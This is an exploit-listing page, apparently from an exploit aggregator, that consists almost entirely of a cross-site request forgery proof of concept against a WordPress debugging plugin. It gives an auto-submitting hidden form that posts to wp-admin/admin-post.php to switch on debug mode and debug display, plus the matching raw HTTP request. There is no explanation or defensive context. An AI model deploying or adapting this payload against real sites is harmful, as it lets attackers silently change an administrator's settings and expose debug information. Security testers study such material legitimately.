Share
## https://sploitus.com/exploit?id=WPEX-ID:8D0E65EE-FDD1-4FD6-9A27-01664C703D90
<form action="https://example.com/wp-admin/admin-post.php" method="post" id="csrf">
<input type="hidden" name="option_page" value="wp_debugging">
<input type="hidden" name="action" value="update">
<input type="hidden" name="wp-debugging[wp_debug]" value="1">
<input type="hidden" name="wp-debugging[wp_debug_display]" value="1">
</form><script>csrf.submit()</script>


POST /wp-admin/admin-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Connection: close
Upgrade-Insecure-Requests: 1

option_page=wp_debugging&action=update&wp-debugging%5Bwp_debug%5D=0&submit=Save+Changes